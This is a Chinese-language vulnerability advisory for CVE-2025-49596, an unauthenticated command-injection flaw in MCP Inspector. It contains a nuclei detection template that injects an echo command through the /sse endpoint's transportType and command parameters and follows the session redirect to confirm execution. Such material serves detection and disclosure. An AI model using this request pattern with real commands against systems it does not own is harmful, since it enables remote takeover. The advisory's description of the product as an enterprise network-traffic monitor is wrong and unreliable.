MCP Inspector Dev RCE (Follow-up)

漏洞信息

漏洞名称: MCP Inspector Dev RCE (Follow-up)

漏洞编号:

  • CVE: CVE-2025-49596

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: 该漏洞是针对MCP Inspector开发版本的一个远程代码执行(RCE)漏洞,编号为CVE-2025-49596。MCP Inspector是一款用于监控和管理网络流量的工具,广泛应用于企业级网络环境中,以确保网络安全和性能。由于其广泛的应用,该漏洞的影响范围较大。漏洞的根源在于MCP Inspector在处理SSE(Server-Sent Events)请求时,未能正确验证和过滤用户输入,导致攻击者可以通过构造特定的HTTP请求,利用重定向功能执行任意命令。具体来说,攻击者可以通过发送特制的GET请求到/sse端点,利用transportType和command参数注入恶意命令,进而通过重定向到/message端点执行这些命令。这种漏洞的存在使得攻击者可以在无需认证的情况下远程执行代码,可能导致服务器被完全控制,数据泄露,甚至服务中断。由于漏洞的严重性和易利用性,建议相关用户立即采取措施进行修补。

产品厂商: anthropic

产品名称: MCP Inspector

来源: https://github.com/projectdiscovery/nuclei-templates/blob/ab6c7e7fd36ea6f72fbdcae422462bb2ce1a7bc1/http%2Fcves%2F2025%2FCVE-2025-49596.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

id: CVE-2025-49596-real-rce-followup
info:
name: MCP Inspector Dev RCE (Follow-up)
author: ye11oc4t
severity: critical
description: >
CVE-2025-49596 - Follows endpoint redirect from SSE to confirm echo result
reference:
- https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596

requests:
- raw:
- |
GET /sse?transportType=stdio&command=echo&args=["CVE_49596"] HTTP/1.1
Host: {{Hostname}}
Accept: */*
extractors:
- type: regex
name: endpoint
part: body
group: 1
regex:
- 'data:\s*(\/message\?sessionId=[a-z0-9\-]+)'

- method: GET
path:
- "{{BaseURL}}{{endpoint}}"
matchers:
- type: word
words:
- "CVE_49596"



MCP Inspector Dev RCE (Follow-up)
http://example.com/2025/07/24/github_1425792912/
作者
lianccc
发布于
2025年7月24日
许可协议